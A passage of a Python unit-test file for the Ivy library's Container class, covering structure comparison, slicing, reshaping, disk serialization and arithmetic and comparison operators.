'b': {'c': ivy.array([4], dev=dev), 'd': ivy.array([5], dev=dev)}})
container2 = Container({'a': ivy.array([3], dev=dev),
'b': {'c': ivy.array([4], dev=dev), 'd': ivy.array([5], dev=dev),
'e': ivy.array([6], dev=dev)}})
container3 = Container({'a': ivy.array([3], dev=dev),
'b': {'c': ivy.array([4], dev=dev), 'd': ivy.array([5], dev=dev)},
'e': ivy.array([6], dev=dev)})
container4 = Container({'b': {'d': ivy.array([4], dev=dev)}})
container5 = Container({'d': ivy.array([4], dev=dev)})
# with identical
assert ivy.Container.identical_structure([container0, container1])
assert ivy.Container.identical_structure([container1, container0])
assert ivy.Container.identical_structure([container1, container0, container1])
# without identical
assert not ivy.Container.identical_structure([container2, container3])
assert not ivy.Container.identical_structure([container0, container3])
assert not ivy.Container.identical_structure([container1, container2])
assert not ivy.Container.identical_structure([container1, container0, container2])
# partial
assert ivy.Container.identical_structure([container0, container4], partial=True)
assert ivy.Container.identical_structure([container1, container4], partial=True)
assert ivy.Container.identical_structure([container2, container4], partial=True)
assert ivy.Container.identical_structure([container3, container4], partial=True)
assert ivy.Container.identical_structure([container4, container4], partial=True)
assert not ivy.Container.identical_structure([container0, container5], partial=True)
assert not ivy.Container.identical_structure([container1, container5], partial=True)
assert not ivy.Container.identical_structure([container2, container5], partial=True)
assert not ivy.Container.identical_structure([container3, container5], partial=True)
assert not ivy.Container.identical_structure([container4, container5], partial=True)
def test_container_identical_configs(dev, call):
container0 = Container({'a': ivy.array([1], dev=dev)}, print_limit=5)
container1 = Container({'a': ivy.array([1], dev=dev)}, print_limit=5)
container2 = Container({'a': ivy.array([1], dev=dev)}, print_limit=10)
# with identical
assert ivy.Container.identical_configs([container0, container1])
assert ivy.Container.identical_configs([container1, container0])
assert ivy.Container.identical_configs([container1, container0, container1])
# without identical
assert not ivy.Container.identical_configs([container1, container2])
assert not ivy.Container.identical_configs([container1, container0, container2])
def test_container_identical_array_shapes(dev, call):
# without key_chains specification
container0 = Container({'a': ivy.array([1, 2], dev=dev),
'b': {'c': ivy.array([2, 3, 4], dev=dev),
'd': ivy.array([3, 4, 5, 6], dev=dev)}})
container1 = Container({'a': ivy.array([1, 2, 3, 4], dev=dev),
'b': {'c': ivy.array([3, 4], dev=dev),
'd': ivy.array([3, 4, 5], dev=dev)}})
container2 = Container({'a': ivy.array([1, 2, 3, 4], dev=dev),
'b': {'c': ivy.array([3, 4], dev=dev),
'd': ivy.array([3, 4, 5, 6], dev=dev)}})
# with identical
assert ivy.Container.identical_array_shapes([container0, container1])
assert ivy.Container.identical_array_shapes([container1, container0])
assert ivy.Container.identical_array_shapes([container1, container0, container1])
assert not ivy.Container.identical([container0, container2])
assert not ivy.Container.identical([container1, container2])
assert not ivy.Container.identical([container0, container1, container2])
def test_container_dtype(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2.], dev=dev), 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
dtype_container = container.dtype()
for (key, value), expected_value in zip(dtype_container.to_iterator(),
[ivy.array([1], dev=dev).dtype,
ivy.array([2.], dev=dev).dtype,
ivy.array([3], dev=dev).dtype]):
assert value == expected_value
def test_container_with_entries_as_lists(dev, call):
if call in [helpers.tf_graph_call]:
# to_list() requires eager execution
pytest.skip()
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2.], dev=dev), 'd': 'some string'}}
container = Container(dict_in)
container_w_list_entries = container.with_entries_as_lists()
for (key, value), expected_value in zip(container_w_list_entries.to_iterator(),
[[1],
[2.],
'some string']):
assert value == expected_value
def test_container_reshape_like(dev, call):
container = Container({'a': ivy.array([[1.]], dev=dev),
'b': {'c': ivy.array([[3.], [4.]], dev=dev),
'd': ivy.array([[5.], [6.], [7.]], dev=dev)}})
new_shapes = Container({'a': (1,),
'b': {'c': (1, 2, 1), 'd': (3, 1, 1)}})
# without leading shape
container_reshaped = container.reshape_like(new_shapes)
assert list(container_reshaped['a'].shape) == [1]
assert list(container_reshaped.a.shape) == [1]
assert list(container_reshaped['b']['c'].shape) == [1, 2, 1]
assert list(container_reshaped.b.c.shape) == [1, 2, 1]
assert list(container_reshaped['b']['d'].shape) == [3, 1, 1]
assert list(container_reshaped.b.d.shape) == [3, 1, 1]
# with leading shape
container = Container({'a': ivy.array([[[1.]], [[1.]], [[1.]]], dev=dev),
'b': {'c': ivy.array([[[3.], [4.]], [[3.], [4.]], [[3.], [4.]]], dev=dev),
'd': ivy.array([[[5.], [6.], [7.]], [[5.], [6.], [7.]], [[5.], [6.], [7.]]],
dev=dev)}})
container_reshaped = container.reshape_like(new_shapes, leading_shape=[3])
assert list(container_reshaped['a'].shape) == [3, 1]
assert list(container_reshaped.a.shape) == [3, 1]
assert list(container_reshaped['b']['c'].shape) == [3, 1, 2, 1]
assert list(container_reshaped.b.c.shape) == [3, 1, 2, 1]
assert list(container_reshaped['b']['d'].shape) == [3, 3, 1, 1]
assert list(container_reshaped.b.d.shape) == [3, 3, 1, 1]
def test_container_slice(dev, call):
dict_in = {'a': ivy.array([[0.], [1.]], dev=dev),
'b': {'c': ivy.array([[1.], [2.]], dev=dev), 'd': ivy.array([[2.], [3.]], dev=dev)}}
container = Container(dict_in)
container0 = container[0]
container1 = container[1]
assert np.array_equal(ivy.to_numpy(container0['a']), np.array([0.]))
assert np.array_equal(ivy.to_numpy(container0.a), np.array([0.]))
assert np.array_equal(ivy.to_numpy(container0['b']['c']), np.array([1.]))
assert np.array_equal(ivy.to_numpy(container0.b.c), np.array([1.]))
assert np.array_equal(ivy.to_numpy(container0['b']['d']), np.array([2.]))
assert np.array_equal(ivy.to_numpy(container0.b.d), np.array([2.]))
assert np.array_equal(ivy.to_numpy(container1['a']), np.array([1.]))
assert np.array_equal(ivy.to_numpy(container1.a), np.array([1.]))
assert np.array_equal(ivy.to_numpy(container1['b']['c']), np.array([2.]))
assert np.array_equal(ivy.to_numpy(container1.b.c), np.array([2.]))
assert np.array_equal(ivy.to_numpy(container1['b']['d']), np.array([3.]))
assert np.array_equal(ivy.to_numpy(container1.b.d), np.array([3.]))
def test_container_slice_via_key(dev, call):
dict_in = {'a': {'x': ivy.array([0.], dev=dev),
'y': ivy.array([1.], dev=dev)},
'b': {'c': {'x': ivy.array([1.], dev=dev),
'y': ivy.array([2.], dev=dev)},
'd': {'x': ivy.array([2.], dev=dev),
'y': ivy.array([3.], dev=dev)}}}
container = Container(dict_in)
containerx = container.slice_via_key('x')
containery = container.slice_via_key('y')
assert np.array_equal(ivy.to_numpy(containerx['a']), np.array([0.]))
assert np.array_equal(ivy.to_numpy(containerx.a), np.array([0.]))
assert np.array_equal(ivy.to_numpy(containerx['b']['c']), np.array([1.]))
assert np.array_equal(ivy.to_numpy(containerx.b.c), np.array([1.]))
assert np.array_equal(ivy.to_numpy(containerx['b']['d']), np.array([2.]))
assert np.array_equal(ivy.to_numpy(containerx.b.d), np.array([2.]))
assert np.array_equal(ivy.to_numpy(containery['a']), np.array([1.]))
assert np.array_equal(ivy.to_numpy(containery.a), np.array([1.]))
assert np.array_equal(ivy.to_numpy(containery['b']['c']), np.array([2.]))
assert np.array_equal(ivy.to_numpy(containery.b.c), np.array([2.]))
assert np.array_equal(ivy.to_numpy(containery['b']['d']), np.array([3.]))
assert np.array_equal(ivy.to_numpy(containery.b.d), np.array([3.]))
def test_container_to_and_from_disk_as_hdf5(dev, call):
if call in [helpers.tf_graph_call]:
# container disk saving requires eager execution
pytest.skip()
save_filepath = 'container_on_disk.hdf5'
dict_in_1 = {'a': ivy.array([np.float32(1.)], dev=dev),
'b': {'c': ivy.array([np.float32(2.)], dev=dev),
'd': ivy.array([np.float32(3.)], dev=dev)}}
container1 = Container(dict_in_1)
dict_in_2 = {'a': ivy.array([np.float32(1.), np.float32(1.)], dev=dev),
'b': {'c': ivy.array([np.float32(2.), np.float32(2.)], dev=dev),
'd': ivy.array([np.float32(3.), np.float32(3.)], dev=dev)}}
container2 = Container(dict_in_2)
# saving
container1.to_disk_as_hdf5(save_filepath, max_batch_size=2)
assert os.path.exists(save_filepath)
# loading
loaded_container = Container.from_disk_as_hdf5(save_filepath, slice(1))
assert np.array_equal(ivy.to_numpy(loaded_container.a), ivy.to_numpy(container1.a))
assert np.array_equal(ivy.to_numpy(loaded_container.b.c), ivy.to_numpy(container1.b.c))
assert np.array_equal(ivy.to_numpy(loaded_container.b.d), ivy.to_numpy(container1.b.d))
# appending
container1.to_disk_as_hdf5(save_filepath, max_batch_size=2, starting_index=1)
assert os.path.exists(save_filepath)
# loading after append
loaded_container = Container.from_disk_as_hdf5(save_filepath)
assert np.array_equal(ivy.to_numpy(loaded_container.a), ivy.to_numpy(container2.a))
assert np.array_equal(ivy.to_numpy(loaded_container.b.c), ivy.to_numpy(container2.b.c))
assert np.array_equal(ivy.to_numpy(loaded_container.b.d), ivy.to_numpy(container2.b.d))
# load slice
loaded_sliced_container = Container.from_disk_as_hdf5(save_filepath, slice(1, 2))
assert np.array_equal(ivy.to_numpy(loaded_sliced_container.a), ivy.to_numpy(container1.a))
assert np.array_equal(ivy.to_numpy(loaded_sliced_container.b.c), ivy.to_numpy(container1.b.c))
assert np.array_equal(ivy.to_numpy(loaded_sliced_container.b.d), ivy.to_numpy(container1.b.d))
# file size
file_size, batch_size = Container.h5_file_size(save_filepath)
assert file_size == 6 * np.dtype(np.float32).itemsize
assert batch_size == 2
os.remove(save_filepath)
def test_container_to_disk_shuffle_and_from_disk_as_hdf5(dev, call):
if call in [helpers.tf_graph_call]:
# container disk saving requires eager execution
pytest.skip()
save_filepath = 'container_on_disk.hdf5'
dict_in = {'a': ivy.array([1, 2, 3], dev=dev),
'b': {'c': ivy.array([1, 2, 3], dev=dev), 'd': ivy.array([1, 2, 3], dev=dev)}}
container = Container(dict_in)
# saving
container.to_disk_as_hdf5(save_filepath, max_batch_size=3)
assert os.path.exists(save_filepath)
# shuffling
Container.shuffle_h5_file(save_filepath)
# loading
container_shuffled = Container.from_disk_as_hdf5(save_filepath, slice(3))
# testing
data = np.array([1, 2, 3])
random.seed(0)
random.shuffle(data)
assert (ivy.to_numpy(container_shuffled['a']) == data).all()
assert (ivy.to_numpy(container_shuffled.a) == data).all()
assert (ivy.to_numpy(container_shuffled['b']['c']) == data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == data).all()
assert (ivy.to_numpy(container_shuffled['b']['d']) == data).all()
assert (ivy.to_numpy(container_shuffled.b.d) == data).all()
os.remove(save_filepath)
# def test_container_pickle(dev, call):
# if call in [helpers.tf_graph_call]:
# # container disk saving requires eager execution
# pytest.skip()
# dict_in = {'a': ivy.array([np.float32(1.)], dev=dev),
# 'b': {'c': ivy.array([np.float32(2.)], dev=dev),
# 'd': ivy.array([np.float32(3.)], dev=dev)}}
#
# # without module attribute
# cont = Container(dict_in)
# assert cont._local_ivy is None
# pickled = pickle.dumps(cont)
# cont_again = pickle.loads(pickled)
# assert cont_again._local_ivy is None
# ivy.Container.identical_structure([cont, cont_again])
# ivy.Container.identical_configs([cont, cont_again])
#
# # with module attribute
# cont = Container(dict_in, ivyh=ivy)
# assert cont._local_ivy is ivy
# pickled = pickle.dumps(cont)
# cont_again = pickle.loads(pickled)
# # noinspection PyUnresolvedReferences
# assert cont_again._local_ivy.current_framework_str() is ivy.current_framework_str()
# ivy.Container.identical_structure([cont, cont_again])
# ivy.Container.identical_configs([cont, cont_again])
def test_container_to_and_from_disk_as_pickled(dev, call):
if call in [helpers.tf_graph_call]:
# container disk saving requires eager execution
pytest.skip()
save_filepath = 'container_on_disk.pickled'
dict_in = {'a': ivy.array([np.float32(1.)], dev=dev),
'b': {'c': ivy.array([np.float32(2.)], dev=dev),
'd': ivy.array([np.float32(3.)], dev=dev)}}
container = Container(dict_in)
# saving
container.to_disk_as_pickled(save_filepath)
assert os.path.exists(save_filepath)
# loading
loaded_container = Container.from_disk_as_pickled(save_filepath)
assert np.array_equal(ivy.to_numpy(loaded_container.a), ivy.to_numpy(container.a))
assert np.array_equal(ivy.to_numpy(loaded_container.b.c), ivy.to_numpy(container.b.c))
assert np.array_equal(ivy.to_numpy(loaded_container.b.d), ivy.to_numpy(container.b.d))
os.remove(save_filepath)
def test_container_to_and_from_disk_as_json(dev, call):
if call in [helpers.tf_graph_call]:
# container disk saving requires eager execution
pytest.skip()
save_filepath = 'container_on_disk.json'
dict_in = {'a': 1.274e-7, 'b': {'c': True, 'd': ivy.array([np.float32(3.)], dev=dev)}}
container = Container(dict_in)
# saving
container.to_disk_as_json(save_filepath)
assert os.path.exists(save_filepath)
# loading
loaded_container = Container.from_disk_as_json(save_filepath)
assert np.array_equal(loaded_container.a, container.a)
assert np.array_equal(loaded_container.b.c, container.b.c)
assert isinstance(loaded_container.b.d, str)
os.remove(save_filepath)
def test_container_positive(dev, call):
container = +Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([-2], dev=dev), 'd': ivy.array([3], dev=dev)}})
assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([-2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([-2]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([3]))
def test_container_negative(dev, call):
container = -Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([-2], dev=dev), 'd': ivy.array([3], dev=dev)}})
assert np.allclose(ivy.to_numpy(container['a']), np.array([-1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([-1]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([-3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([-3]))
# def test_container_pow(dev, call):
# container_a = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container_b = Container({'a': ivy.array([2], dev=dev),
# 'b': {'c': ivy.array([4], dev=dev), 'd': ivy.array([6], dev=dev)}})
# container = container_a ** container_b
# assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
# assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
# assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([16]))
# assert np.allclose(ivy.to_numpy(container.b.c), np.array([16]))
# assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([729]))
# assert np.allclose(ivy.to_numpy(container.b.d), np.array([729]))
def test_container_scalar_pow(dev, call):
container_a = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container = container_a ** 2
assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([4]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([4]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([9]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([9]))
def test_container_reverse_scalar_pow(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container = 2 ** container
assert np.allclose(ivy.to_numpy(container['a']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([4]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([4]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([8]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([8]))
def test_container_scalar_addition(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container += 3
assert np.allclose(ivy.to_numpy(container['a']), np.array([4]))
assert np.allclose(ivy.to_numpy(container.a), np.array([4]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([6]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([6]))
def test_container_reverse_scalar_addition(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container = 3 + container
assert np.allclose(ivy.to_numpy(container['a']), np.array([4]))
assert np.allclose(ivy.to_numpy(container.a), np.array([4]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([6]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([6]))
def test_container_addition(dev, call):
container_a = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container_b = Container({'a': ivy.array([2], dev=dev),
'b': {'c': ivy.array([4], dev=dev), 'd': ivy.array([6], dev=dev)}})
container = container_a + container_b
assert np.allclose(ivy.to_numpy(container['a']), np.array([3]))
assert np.allclose(ivy.to_numpy(container.a), np.array([3]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([6]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([6]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([9]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([9]))
def test_container_scalar_subtraction(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container -= 1
assert np.allclose(ivy.to_numpy(container['a']), np.array([0]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([1]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([2]))
def test_container_reverse_scalar_subtraction(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container = 1 - container
assert np.allclose(ivy.to_numpy(container['a']), np.array([0]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([-1]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([-1]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([-2]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([-2]))
def test_container_subtraction(dev, call):
container_a = Container({'a': ivy.array([2], dev=dev),
'b': {'c': ivy.array([4], dev=dev), 'd': ivy.array([6], dev=dev)}})
container_b = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([1], dev=dev), 'd': ivy.array([4], dev=dev)}})
container = container_a - container_b
assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([3]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([2]))
def test_container_sum(dev, call):
container_a = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container_b = Container({'a': ivy.array([2], dev=dev),
'b': {'c': ivy.array([4], dev=dev), 'd': ivy.array([6], dev=dev)}})
container = sum([container_a, container_b])
assert np.allclose(ivy.to_numpy(container['a']), np.array([3]))
assert np.allclose(ivy.to_numpy(container.a), np.array([3]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([6]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([6]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([9]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([9]))
def test_container_scalar_multiplication(dev, call):
container = Container({'a': ivy.array([1.], dev=dev),
'b': {'c': ivy.array([2.], dev=dev), 'd': ivy.array([3.], dev=dev)}})
container *= 2.5
assert np.allclose(ivy.to_numpy(container['a']), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([5.]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5.]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([7.5]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([7.5]))
def test_container_reverse_scalar_multiplication(dev, call):
container = Container({'a': ivy.array([1.], dev=dev),
'b': {'c': ivy.array([2.], dev=dev), 'd': ivy.array([3.], dev=dev)}})
container = 2.5 * container
assert np.allclose(ivy.to_numpy(container['a']), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([5.]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5.]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([7.5]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([7.5]))
def test_container_multiplication(dev, call):
container_a = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container_b = Container({'a': ivy.array([2], dev=dev),
'b': {'c': ivy.array([4], dev=dev), 'd': ivy.array([6], dev=dev)}})
container = container_a * container_b
assert np.allclose(ivy.to_numpy(container['a']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([8]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([8]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([18]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([18]))
def test_container_scalar_truediv(dev, call):
container = Container({'a': ivy.array([1.], dev=dev),
'b': {'c': ivy.array([5.], dev=dev), 'd': ivy.array([5.], dev=dev)}})
container /= 2
assert np.allclose(ivy.to_numpy(container['a']), np.array([0.5]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0.5]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([2.5]))
def test_container_reverse_scalar_truediv(dev, call):
container = Container({'a': ivy.array([1.], dev=dev),
'b': {'c': ivy.array([5.], dev=dev), 'd': ivy.array([5.], dev=dev)}})
container = 2 / container
assert np.allclose(ivy.to_numpy(container['a']), np.array([2.]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2.]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([0.4]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([0.4]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([0.4]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([0.4]))
def test_container_truediv(dev, call):
container_a = Container({'a': ivy.array([1.], dev=dev),
'b': {'c': ivy.array([5.], dev=dev), 'd': ivy.array([5.], dev=dev)}})
container_b = Container({'a': ivy.array([2.], dev=dev),
'b': {'c': ivy.array([2.], dev=dev), 'd': ivy.array([4.], dev=dev)}})
container = container_a / container_b
assert np.allclose(ivy.to_numpy(container['a']), np.array([0.5]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0.5]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2.5]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([1.25]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([1.25]))
def test_container_scalar_floordiv(dev, call):
if call is helpers.mx_call:
# MXnet arrays do not overload the // operator, can add if explicit ivy.floordiv is implemented at some point
pytest.skip()
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([5], dev=dev)}})
container //= 2
assert np.allclose(ivy.to_numpy(container['a']), np.array([0]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([2]))
def test_container_reverse_scalar_floordiv(dev, call):
if call is helpers.mx_call:
# MXnet arrays do not overload the // operator, can add if explicit ivy.floordiv is implemented at some point
pytest.skip()
container = Container({'a': ivy.array([2], dev=dev),
'b': {'c': ivy.array([1], dev=dev), 'd': ivy.array([7], dev=dev)}})
container = 5 // container
assert np.allclose(ivy.to_numpy(container['a']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.a), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([0]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([0]))
def test_container_floordiv(dev, call):
if call is helpers.mx_call:
# MXnet arrays do not overload the // operator, can add if explicit ivy.floordiv is implemented at some point
pytest.skip()
container_a = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([5], dev=dev)}})
container_b = Container({'a': ivy.array([2], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([4], dev=dev)}})
container = container_a // container_b
assert np.allclose(ivy.to_numpy(container['a']), np.array([0]))
assert np.allclose(ivy.to_numpy(container.a), np.array([0]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([1]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([1]))
def test_container_abs(dev, call):
container = abs(Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([-2], dev=dev), 'd': ivy.array([3], dev=dev)}}))
assert np.allclose(ivy.to_numpy(container['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([3]))
def test_container_scalar_less_than(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container = container < 2
assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_reverse_scalar_less_than(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container = 2 < container
assert np.allclose(ivy.to_numpy(container['a']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_less_than(dev, call):
container_a = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([5], dev=dev)}})
container_b = Container({'a': ivy.array([2], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([5], dev=dev)}})
container = container_a < container_b
assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
# def test_container_scalar_less_than_or_equal_to(dev, call):
# container = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container = container <= 2
# assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
# assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
# assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
# assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
# assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
# assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_reverse_scalar_less_than_or_equal_to(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container = 2 <= container
assert np.allclose(ivy.to_numpy(container['a']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
